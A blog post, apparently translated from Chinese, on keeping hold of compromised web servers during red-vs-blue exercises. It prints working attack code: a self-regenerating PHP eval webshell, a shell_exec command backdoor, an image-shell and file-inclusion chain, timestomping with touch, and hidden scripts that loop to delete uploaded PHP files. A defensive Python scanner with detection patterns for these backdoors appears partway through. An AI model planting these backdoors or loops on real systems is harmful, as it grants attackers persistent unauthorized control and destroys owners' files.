Preface
Persistence, in red-vs-blue exercises, serves two purposes in my view: first, to keep the access already obtained from being destroyed by the blue team; second, to keep other red teams from obtaining the same access (a bit mean, admittedly...).
Illegal uses in other situations are not discussed here.
The principle of persistence, in my view, is that it must not affect the normal operation of the original business (for example, changing the admin password so the administrator can no longer log in, or changing folder read/write permissions so legitimate files can no longer be uploaded).
Maintaining admin-panel access
When we obtain admin-panel access through a weak password or brute force, we need to maintain that access so it is not lost when the administrator, or another red team, changes the password.
Changing the admin password yourself is of course the clumsiest method.
One option is to insert XSS code into the admin panel's source code; this presupposes that webshell access has already been obtained. When the administrator visits the panel, we receive the cookie. For details see:
Reference
This feels somewhat redundant: since webshell access already exists, why maintain admin-panel access at all? Its advantage is that JS code inserted into the source is not easy to notice.
Maintaining webshell access
The most common form of access is a webshell. Once a webshell has been obtained, the blue team may discover and delete it, and other red teams may also obtain the same access. Both cases call for persistence.
Against the blue team
Write the shell into another folder: the initial upload path is usually a folder that holds images and similar files. If a file with a .php suffix suddenly appears in such a folder, it will almost certainly be noticed, so to avoid detection by the blue team the usual practice is to write the shell into some other writable folder.
Change the shell's timestamps: this mainly concerns Linux, where there are few webshell scanners and hunting is often done with commands.
A likely command is find, for example:
find -name "*.php" -type f -mtime -3 -exec ls -l {} \;
The timestamp is changed with the touch command, for example:
touch -d '08-August-2019' rrr.php
The effect is as follows:
Write an undying shell: an "undying shell" (不死马) is a trojan that stays resident in memory and keeps regenerating the shell at some path in a loop, so the shell reappears even after it is deleted. The versions circulating online did not work when I tried them, so I modified one myself; this is the simplest form, with no AV evasion, for reference only:
<?php
ignore_user_abort(true);   // keep running after the client disconnects
set_time_limit(0);         // no execution time limit
unlink(__FILE__);          // remove this file; the process stays in memory
$file = '3.php';
$code = '<?php @eval($_POST[\'pass\']);?>';
while (1) {
    file_put_contents($file, $code);
    system('touch -m -d "2018-12-01 09:10:12" 3.php');
    usleep(5000);
}
?>
Write other backdoors:
1. A command-execution backdoor, for example:
<?php
$cmd = $_GET["name"];
echo shell_exec($cmd);
?>
2. An image shell combined with a file-inclusion script: write the malicious code into an image, place a file with a file-inclusion vulnerability in the appropriate location, and visit that file so that it parses the image shell; the image shell then generates the real shell, which can be connected to directly.
For example, the following code is inserted into the image to generate the shell:
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['cmd']);?>")?>
File-inclusion code:
<?php
$filename = $_GET['f']; // pass the value of the f parameter into $filename
include($filename);     // include that file with include()
?>
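A defender-side check for the three tricks just described (PHP dropped among images, the backdoor patterns, and touch -d timestomping), added here as an example that is not part of the original post. It assumes a Linux host and only the Python standard library; the sample files built in demo() are constructed. The caveat the post leaves out: touch can rewind mtime, but the kernel always sets ctime to the current time, so a PHP-bearing file whose mtime sits far behind its ctime deserves a look.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Source-level indicators modelled on the backdoor samples in the post above.
# Heuristics for triage, not proof of compromise: review every hit by hand.
INDICATORS = {
    "eval-of-request-param": re.compile(r"@?\beval\s*\(\s*\\?\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "shell-from-variable": re.compile(r"\b(?:shell_exec|system|passthru|exec)\s*\(\s*\$"),
    "dynamic-include": re.compile(r"\binclude(?:_once)?\s*\(\s*\$"),
    "self-rewriting-loop": re.compile(r"\bfile_put_contents\s*\(\s*\$\w+\s*,"),
}
PHP_EXT = {".php", ".phtml", ".php5", ".phar"}

def scan_uploads(root, max_mtime_gap=7 * 86400, max_bytes=1 << 20):
    """Return [(relative_path, [reasons])] for files under root that look like shells.
    touch -d rewinds mtime but Linux always bumps ctime, so a large ctime-minus-mtime
    gap on a file that contains PHP code is a timestomp indicator (cp -p / rsync -a
    do the same to legitimate files, hence the PHP-content requirement)."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        data = path.read_bytes()[:max_bytes]
        has_php = b"<?php" in data or b"<?=" in data
        reasons = []
        if has_php and path.suffix.lower() not in PHP_EXT:
            reasons.append("php-code-in-non-php-file")  # image shell / polyglot
        text = data.decode("latin-1")  # never raises on binary input
        reasons += [name for name, rx in INDICATORS.items() if rx.search(text)]
        if has_php:
            st = path.stat()
            if st.st_ctime - st.st_mtime > max_mtime_gap:
                reasons.append("mtime-rewound-behind-ctime")
        if reasons:
            findings.append((str(path.relative_to(root)), reasons))
    return findings

def demo():
    """Constructed sample upload dir: a timestomped shell, an image polyglot, a clean PNG."""
    d = Path(tempfile.mkdtemp(prefix="uploads_"))
    (d / "shell.php").write_text("<?php @eval($_POST['pass']);?>")
    old = time.time() - 365 * 86400
    os.utime(d / "shell.php", (old, old))  # what touch -m -d does to mtime; ctime stays now
    (d / "pic.gif").write_bytes(b"GIF89a<?php fputs(fopen(\"s.php\",\"w\"),\"<?php eval(\\$_POST['cmd']);?>\")?>")
    (d / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    return scan_uploads(d)
```

Run scan_uploads() over the real upload directory on a schedule, or from an inotify/auditd trigger, and ship the findings to the SIEM; files that are rewritten every few milliseconds (the undying shell above) additionally show up as a PHP process with no client connection in the web server's process list.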
Against other red teams
A webshell is commonly obtained by uploading a shell through some upload point. The upload folder path is generally fixed; there cannot be one folder per file.
To stop other red teams from obtaining a webshell, my approach is to drop a batch script or bash script in the upload folder that loops over the files in the current folder and deletes any file with the specified suffix. The code is roughly as follows:
Windows:
@echo off
cls
if "%1"=="h" goto start
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:start
for %%i in (*.php) do (del %%i)
choice /t 5 /d y /n >nul
goto start
Linux:
#!/bin/bash
while true; do
    find . -type f -name "*.php" | xargs rm -rf
done